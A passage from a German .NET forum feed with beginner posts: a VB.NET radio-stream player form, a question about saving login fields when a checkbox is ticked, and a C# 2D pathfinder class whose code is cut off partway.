<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"> Private Sub GhostRadiobutton1_CheckedChanged(ByVal sender As System.Object) Handles GhostRadiobutton1.CheckedChanged<br />
<br />
&nbsp; &nbsp; End Sub</code><hr />
</div>
</div>
</div>
</div><br />
<br />
der Gesamt code:<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Public Class Form1<br />
<br />
&nbsp; &nbsp; Private Sub GhostButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles GhostButton1.Click<br />
&nbsp; &nbsp; &nbsp; &nbsp; AxWindowsMediaPlayer1.URL = (&quot;STREAM&quot;)<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub GhostButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles GhostButton2.Click<br />
&nbsp; &nbsp; &nbsp; &nbsp; AxWindowsMediaPlayer1.URL = Nothing<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub TrackBar1_Scroll(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TrackBar1.Scroll<br />
&nbsp; &nbsp; &nbsp; &nbsp; AxWindowsMediaPlayer1.settings.volume = TrackBar1.Value<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub GhostRadiobutton1_CheckedChanged(ByVal sender As System.Object) Handles GhostRadiobutton1.CheckedChanged<br />
<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub GhostRadiobutton2_CheckedChanged(ByVal sender As System.Object) Handles GhostRadiobutton2.CheckedChanged<br />
<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub GhostRadiobutton3_CheckedChanged(ByVal sender As System.Object) Handles GhostRadiobutton3.CheckedChanged<br />
<br />
&nbsp; &nbsp; End Sub<br />
End Class</code><hr />
</div>
</div>
</div>
</div><br />
Was  muss ich einfügen um bei jeden button den ich für radios nutzen will einzufügen? <br />
<br />
Sonst, wie kann ich in einer LinkLabel z.B: Credits einfügen wenn man draufklickt? <br />
<br />
Danke schonmal für eure hilfe.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/frage-ghostradiobutton1-11570</guid>
		</item>
		<item>
			<title>C# Logindaten speichern</title>
			<link>net-94/logindaten-speichern-11541?goto=newpost</link>
			<pubDate>Sat, 28 Apr 2012 10:40:16 GMT</pubDate>
			<description><![CDATA[Hey ich hab da ein Problem :/ 
 
Und zwar möchte ich Logindaten speicher, wenn man die Checkbox "abhackelt". 
Also den Text aus Textbox 1, Textbox 2,...]]></description>
			<content:encoded><![CDATA[<div>Hey ich hab da ein Problem :/<br />
<br />
Und zwar möchte ich Logindaten speicher, wenn man die Checkbox &quot;abhackelt&quot;.<br />
Also den Text aus Textbox 1, Textbox 2, Textbox 3, Textbox 4.<br />
Nur ich habe halt keinen Plan wie ich das anstelle und Google spuckt auch nichts vernünftiges aus.<br />
<br />
Ich hoffe ihr könnt mir helfen bzw. Ansätze geben.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Saad</dc:creator>
			<guid isPermaLink="true">net-94/logindaten-speichern-11541</guid>
		</item>
		<item>
			<title>C# Pathfinder</title>
			<link>net-94/pathfinder-11173?goto=newpost</link>
			<pubDate>Fri, 20 Apr 2012 23:38:24 GMT</pubDate>
			<description>Hallo, 
Eine kleine Knobelaufgabe, ich brauchte das mal wieder nach einiger Zeit. Das ganze ist eine Klassenbibliothek (.dll) und hat drei Klassen. 
...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
Eine kleine Knobelaufgabe, ich brauchte das mal wieder nach einiger Zeit. Das ganze ist eine Klassenbibliothek (.dll) und hat drei Klassen.<br />
<br />
Vorweg muss glaube ich erklärt werden, was ein Pathfinder überhaupt ist.<br />
Ein Pathfinder findet auf einer Map (in meinem Fall 2D) den Weg zu einer bestimmten Zielkoordinate und umgeht wenn nötig Blockaden (wie z.B. Wände).<br />
<br />
In meinem Pathfinder ist aber nicht nur eine Pathfinder-Klasse sondern auch eine Map und eine Character Klasse. Man kann ohne viel ändern zu müssen, diese gleich für ein einfaches Spiel oder whatever nutzen.<br />
<br />
<b>Map Klasse</b> (Int32 Width, Int32 Height)<br />
Die wichtigste Variable in der Map Klasse ist die <i>fields</i> Variable (String[,]), ein mehrdeminsionaler String. Jede Koordinate hat einen String zugeordnet der Informationen enthält über die Koordinate, in meiner Klasse jetzt nur ob sie begehbar ist oder nicht, aber man kann durch die Funktion „AddFieldInfo(String name, String value, Int32 x, Int32 y)” eigene Infos dazupacken. Wie z.B. das Aussehen des Tiles (Gras / Wasser - wenn man es auf eine Spiel-Map abgesehen hat) oder was man eben gerne mag.<br />
<br />
<b>Character Klasse</b> (String heroname)<br />
Die Character Klasse erstellt einen Charakter den man auf eine Map spawnen kann, mithilfe der Spawn(Map map, Int32 x, Int32 y) Funktion. Der String im Konstruktor ist eigentlich nur so da, bis jetzt keine Funktion.<br />
<br />
Spannend wird es, nachdem man seinen Character gespawnt hat und ihn via move(Int32 x, Int32 y) bewegt. Man übergibt x &amp; y Koordinate und dieser ruft dann folgendes auf ...<br />
<br />
<b>Pathfinder Klasse</b><br />
Hat eine statische Funktion „Find(Character c, Int32 x, Int32 y)”, welche die Schritte zurückgibt wie man zu seiner Zielkoordinate hinkommt (x, y). Kommt man nicht hin, wird eine leere List&lt;Int[]&gt; zurückgegeben. Den Charakter könnte man auf einer grafischen Oberfläche dann in etwa so bewegen, dass man die List&lt;Int[]&gt; mit einer Forschleife durchgeht und dann den Char dahinbewegen lässt.<br />
<br />
<br />
Der Aufruf würde in etwa so lauten<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Map justmap = new Map(10, 10);<br />
Character c = new Character(&quot;Drilon&quot;);<br />
<br />
for (int i = 4; i &lt; 10; i++) { justmap.BlockField(i, 2); }<br />
c.Spawn(justmap, 5, 0);<br />
c.Move(6, 6);</code><hr />
</div>Das würde in dem Beispiel einen Charakter auf den Koordinaten x:5,y:0spawnen lassen, der läuft dann nach oben und trifft bis x:5,y:1 weil auf x:5,y:2 das Feld blockiert ist. Er probiert dann nach rechts zu laufen bis es auf der Y-Achse weiter nach oben geht oder bis er die Wand rechts erreicht. Wenn er keinen Weg nach oben findet, geht er an seine letzte Position zurück, wo er zum ersten Mal auf die Mauer gestoßen ist (x:5,y:1) und versucht es weiter indem er nach links geht bis es nach oben geht. <br />
<br />
Falls einer keine Lust hat das ganze runterzuladen, hier die Pathfinder Funktion im Spoiler. Die Console.WriteLines() könnt ihr gerne rausnehmen, sind nur zum Test da.<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">/// &lt;summary&gt;<br />
&nbsp; &nbsp; &nbsp; &nbsp; /// Findet den Weg zu einer bestimmten Koordinate auf der aktuellen Map<br />
&nbsp; &nbsp; &nbsp; &nbsp; /// &lt;/summary&gt;<br />
&nbsp; &nbsp; &nbsp; &nbsp; /// &lt;param name=&quot;c&quot;&gt;Charakter, welcher sich bewegen soll&lt;/param&gt;<br />
&nbsp; &nbsp; &nbsp; &nbsp; /// &lt;param name=&quot;x&quot;&gt;Die X Zielkoordinate&lt;/param&gt;<br />
&nbsp; &nbsp; &nbsp; &nbsp; /// &lt;param name=&quot;y&quot;&gt;Die Y Zielkoordinate&lt;/param&gt;<br />
&nbsp; &nbsp; &nbsp; &nbsp; /// &lt;returns&gt;Gibt eine Liste mit den Koordinaten wieder, wie man zum Ziel gelangt&lt;/returns&gt;<br />
&nbsp; &nbsp; &nbsp; &nbsp; static public List&lt;Int32[]&gt; Find(Character c, Int32 x, Int32 y)<br />
&nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; List&lt;Int32[]&gt; rtnList = new List&lt;int[]&gt;();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Int32[] anker;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Map map = c.map;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; while(c.x != x || c.y != y)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (c.y &lt; y)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if(map.IsFieldBlocked(c.x, c.y + 1))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;[!] Mauer auf &quot; + c.x.ToString() + &quot;:&quot; + (c.y + 1).ToString() + &quot; entdeckt&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; anker = new Int32[] {c.x, c.y};<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; do<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;# &quot; + c.x.ToString() + &quot;:&quot; + c.y.ToString());<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if((c.x + 1) &lt; map.Width &amp;&amp; !map.IsFieldBlocked(c.x + 1, c.y))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; { <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.x++;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; rtnList.Add(new Int32[] { c.x, c.y });<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;[ADD] &quot; + c.x.ToString() + &quot;:&quot; + c.y.ToString());<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; for(int i = rtnList.Count - 1; i &gt;= 0; i--) {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;[CHECK FOR REM] &quot; + rtnList[i][0].ToString());<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (rtnList[i][0] &gt; anker[0]) { Console.WriteLine(&quot;[REM] &quot; + rtnList[i][0].ToString()); rtnList.Remove(rtnList[i]); }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.x = anker[0];<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.y = anker[1];<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;[WALL] Nach rechts geht es nicht weiter ... zurück zum Anker&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; do<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;# &quot; + c.x.ToString() + &quot;:&quot; + c.y.ToString());<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ((c.x - 1) &gt; -1 &amp;&amp; !map.IsFieldBlocked(c.x - 1, c.y)) <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; { <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.x--;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; rtnList.Add(new Int32[] { c.x, c.y });<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;[!] Es gibt keinen Weg zum Ziel, sorry.&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return new List&lt;Int32[]&gt;();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; } while(map.IsFieldBlocked(c.x, c.y + 1));<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; } while(map.IsFieldBlocked(c.x, c.y + 1));<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;# &quot; + c.x.ToString() + &quot;:&quot; + c.y.ToString());<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.y++;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; rtnList.Add(new Int32[] {c.x, c.y});<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;[ADD] &quot; + c.x.ToString() + &quot;:&quot; + c.y.ToString());<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if(c.y == y &amp;&amp; c.x &lt; x)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;[Y REACHED] # &quot; + c.x.ToString() + &quot;:&quot; + c.y.ToString());<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.x++;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; rtnList.Add(new Int32[] {c.x, c.y});<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (c.y == y &amp;&amp; c.x &gt; x)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;[Y REACHED] # &quot; + c.x.ToString() + &quot;:&quot; + c.y.ToString());<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.x--;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; rtnList.Add(new Int32[] { c.x, c.y });<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (c.y &gt; y)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (map.IsFieldBlocked(c.x, c.y - 1))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; anker = new Int32[] { c.x, c.y };<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; do<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ((c.x + 1) &lt; map.Width &amp;&amp; !map.IsFieldBlocked(c.x + 1, c.y))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.x++;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; rtnList.Add(new Int32[] { c.x, c.y });<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.x = anker[0];<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.y = anker[1];<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; for (int i = rtnList.Count - 1; i &gt;= 0; i--)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (rtnList[i][0] &gt; anker[0]) { rtnList.Remove(rtnList[i]); }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; do<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ((c.x - 1) &gt; -1 &amp;&amp; !map.IsFieldBlocked(c.x - 1, c.y))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.x--;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; rtnList.Add(new Int32[] { c.x, c.y });<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return new List&lt;Int32[]&gt;();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; } while (map.IsFieldBlocked(c.x, c.y - 1));<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;<br />
